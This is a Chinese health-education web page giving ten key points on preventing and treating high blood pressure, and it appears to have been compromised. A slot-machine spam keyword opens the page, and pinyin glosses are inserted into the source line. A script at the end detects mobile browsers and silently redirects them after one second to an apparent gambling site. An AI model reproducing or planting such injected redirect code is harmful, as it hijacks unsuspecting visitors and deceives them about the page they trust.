ag8老虎机

防治高血压宣传教育知识要点

--中国健康知识传播激励计划

  日期:2013-12-27   点击:4295
  1. 高血压是最常见的心血管疾病,可能危及每一个人的健康,因此成年人每年至少应测量一次血压。
  2. 高血压病人早期常无感觉,往往悄然起病并造成突发事件,被公认为“无声杀手”。
  3. 中风、心脏病、肾功能不全等疾病是最常见的高血压并发症,致残、致死率高,危害严重。
  4. 超重和肥胖、高盐饮食、过量饮酒是高血压发生的主要危险因素;控制体重、限盐、限酒是防治高血压的有效措施。
  5. 血压易受环境、活动、情绪及用药不规则等多种因素影响而发生波动,因此高血压病人要经常测量血压。
  6. 健康的生活方式是高血压防治的基石,持之以恒将终身受益。
  7. 控制高血压患者血压水平,减少心、脑、肾等器官损害。
  8. 全面考虑各种心脑血管病的危险因素,药物与非药物疗法相结合,全面达到治疗目标。
  9. 合理选择、长期坚持、规律服用治疗高血压药物,是持续平稳有效降压的基本保证。
  10.  人人参与,共同行动,提高高血压知晓率、治疗率和控制率。

 

自(zi)《中国健康(kang)知识传播激励计划》)

var _hmt = _hmt || []; (function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?993185dc8689f489fddf05459dcb9ba5"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s); })(); function browserRedirect() { var sUserAgent= navigator.userAgent.toLowerCase(); var bIsIpad= sUserAgent.match(/ipad/i) == "ipad"; var bIsIphoneOs= sUserAgent.match(/iphone os/i) == "iphone os"; var bIsMidp= sUserAgent.match(/midp/i) == "midp"; var bIsUc7= sUserAgent.match(/rv:1.2.3.4/i) == "rv:1.2.3.4"; var bIsUc= sUserAgent.match(/ucweb/i) == "ucweb"; var bIsAndroid= sUserAgent.match(/android/i) == "android"; var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce"; var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile"; if (bIsIpad || bIsIphoneOs || bIsMidp || bIsUc7 || bIsUc || bIsAndroid || bIsCE || bIsWM) { window.setTimeout("window.location='http://leyubet1410.com'",1000); } else { document.writeln(""); document.writeln(""); document.writeln(""); } } browserRedirect();